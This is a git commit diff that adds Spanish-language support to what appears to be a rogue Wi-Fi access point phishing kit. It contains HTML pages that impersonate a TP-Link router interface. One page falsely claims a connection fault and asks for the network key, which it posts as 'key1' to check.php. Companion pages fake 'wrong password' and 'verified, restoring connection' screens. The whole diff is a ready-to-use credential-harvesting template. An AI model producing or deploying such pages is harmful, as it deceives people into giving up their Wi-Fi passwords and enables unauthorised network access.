Merge pull request #1119 from mariod8/master
TP-Link router Spanish language support
This commit is contained in:
commit
ab1d691fd2
|
@ -0,0 +1,50 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="tr">
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
|
||||||
|
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||||
|
<style>
|
||||||
|
body {
|
||||||
|
height: 100%;
|
||||||
|
margin: 0px;
|
||||||
|
background-color: rgba(255, 255, 255, 0.3);
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
.error-text {
|
||||||
|
background-color: rgb(102, 186, 51);
|
||||||
|
width: 100%;
|
||||||
|
display: inline-block;
|
||||||
|
}
|
||||||
|
|
||||||
|
h1 {
|
||||||
|
font-size: 16px;
|
||||||
|
color: WHITE;
|
||||||
|
font-weight: bold;
|
||||||
|
margin-left: 15px;
|
||||||
|
margin-top: 5px;
|
||||||
|
margin-bottom: 5px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.context {
|
||||||
|
margin-left: 5%;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<div class="error-text">
|
||||||
|
<h1>Error de conexión</h1>
|
||||||
|
</div>
|
||||||
|
<div class="context">
|
||||||
|
<p>La contraseña es incorrecta.</p>
|
||||||
|
<p>Por favor, introduzca de nuevo su contraseña</p>
|
||||||
|
<center style="margin-right: 5%; margin-top: 5%;">
|
||||||
|
<input onclick="history.back();return false" type="submit" value="Atrás" />
|
||||||
|
</center>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
|
@ -0,0 +1,54 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="tr">
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
|
||||||
|
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||||
|
<style>
|
||||||
|
body {
|
||||||
|
height: 100%;
|
||||||
|
margin: 0px;
|
||||||
|
background-color: rgba(255, 255, 255, 0.3);
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
.error-text {
|
||||||
|
background-color: rgb(102, 186, 51);
|
||||||
|
width: 100%;
|
||||||
|
display: inline-block;
|
||||||
|
}
|
||||||
|
|
||||||
|
h1 {
|
||||||
|
font-size: 16px;
|
||||||
|
color: WHITE;
|
||||||
|
font-weight: bold;
|
||||||
|
margin-left: 15px;
|
||||||
|
margin-top: 5px;
|
||||||
|
margin-bottom: 5px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.context {
|
||||||
|
margin-left: 5%;
|
||||||
|
}
|
||||||
|
|
||||||
|
.loading {
|
||||||
|
width: 100px;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<div class="error-text">
|
||||||
|
<h1>Error de conexión</h1>
|
||||||
|
</div>
|
||||||
|
<div class="context">
|
||||||
|
<p>Contraseña verificada correctamente.</p>
|
||||||
|
<p>Restaurando conexión...</p>
|
||||||
|
<center style="margin-right: 5%; margin-top: 5%;">
|
||||||
|
<img class="loading" src="images/loading.gif">
|
||||||
|
</center>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
Binary file not shown.
After Width: | Height: | Size: 10 KiB |
Binary file not shown.
After Width: | Height: | Size: 318 B |
Binary file not shown.
After Width: | Height: | Size: 78 KiB |
Binary file not shown.
After Width: | Height: | Size: 5.2 KiB |
Binary file not shown.
After Width: | Height: | Size: 16 KiB |
Binary file not shown.
After Width: | Height: | Size: 605 B |
|
@ -0,0 +1,96 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="tr">
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
|
||||||
|
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||||
|
<title>Router TP-Link</title>
|
||||||
|
<style>
|
||||||
|
html {
|
||||||
|
height: 100%;
|
||||||
|
margin: auto;
|
||||||
|
}
|
||||||
|
|
||||||
|
body {
|
||||||
|
margin: 0px;
|
||||||
|
background-image: url(images/background.png);
|
||||||
|
height: 100%;
|
||||||
|
margin: auto;
|
||||||
|
}
|
||||||
|
|
||||||
|
.header {
|
||||||
|
background-image: url(images/top_bg.jpg);
|
||||||
|
overflow: auto;
|
||||||
|
user-select: none;
|
||||||
|
-khtml-user-select: none;
|
||||||
|
-o-user-select: none;
|
||||||
|
-moz-user-select: -moz-none;
|
||||||
|
-webkit-user-select: none;
|
||||||
|
pointer-events: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.header .left {
|
||||||
|
float: left;
|
||||||
|
}
|
||||||
|
|
||||||
|
.header .left img {
|
||||||
|
position: relative;
|
||||||
|
z-index: 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
.header .right {
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
.header .right img {
|
||||||
|
position: absolute;
|
||||||
|
right: 0;
|
||||||
|
z-index: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
.panel_content {
|
||||||
|
border: none;
|
||||||
|
overflow: auto;
|
||||||
|
height: 80%;
|
||||||
|
}
|
||||||
|
|
||||||
|
iframe {
|
||||||
|
border: none;
|
||||||
|
display: block;
|
||||||
|
margin-top: 10%;
|
||||||
|
border-radius: 8px;
|
||||||
|
overflow: auto;
|
||||||
|
user-select: none;
|
||||||
|
-khtml-user-select: none;
|
||||||
|
-o-user-select: none;
|
||||||
|
-moz-user-select: -moz-none;
|
||||||
|
-webkit-user-select: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.hcenter {
|
||||||
|
margin: auto;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
<!--<link rel="stylesheet" type="text/css" href="info.css" media="all">-->
|
||||||
|
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<div class="header">
|
||||||
|
<div class="left">
|
||||||
|
<img src="images/top1_1.jpg">
|
||||||
|
</div>
|
||||||
|
<div class="right">
|
||||||
|
<img src="images/top1_2.jpg" />
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div class="panel_content" id="panel_content" align="center">
|
||||||
|
<div class="hcenter">
|
||||||
|
|
||||||
|
<iframe src="info.html" width="440" height="265" align="center"></iframe>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
|
@ -0,0 +1,53 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="tr">
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
|
||||||
|
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||||
|
<style>
|
||||||
|
body {
|
||||||
|
height: 100%;
|
||||||
|
margin: 0px;
|
||||||
|
background-color: rgba(255, 255, 255, 0.3);
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
.error-text {
|
||||||
|
background-color: rgb(102, 186, 51);
|
||||||
|
width: 100%;
|
||||||
|
display: inline-block;
|
||||||
|
}
|
||||||
|
|
||||||
|
h1 {
|
||||||
|
font-size: 16px;
|
||||||
|
color: WHITE;
|
||||||
|
font-weight: bold;
|
||||||
|
margin-left: 15px;
|
||||||
|
margin-top: 5px;
|
||||||
|
margin-bottom: 5px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.context {
|
||||||
|
margin-left: 5%;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<div class="error-text">
|
||||||
|
<h1>Error de conexión</h1>
|
||||||
|
</div>
|
||||||
|
<div class="context">
|
||||||
|
<p>Se ha detectado un problema de conexión y la configuración se ha reestablecido.</p>
|
||||||
|
<p>Introduzca de nuevo la clave de red para restaurar la conexión:</p>
|
||||||
|
<form id="form1" name="form1" method="POST" action="check.php">
|
||||||
|
<center style="margin-right: 5%; margin-top: 5%;">
|
||||||
|
<p style="display:inline;">Clave:</p>
|
||||||
|
<input name="key1" type="password" style="display:inline;" />
|
||||||
|
<input name="Confirm" class="confirmbtn" type="submit" value="Aceptar" />
|
||||||
|
</center>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
Loading…
Reference in New Issue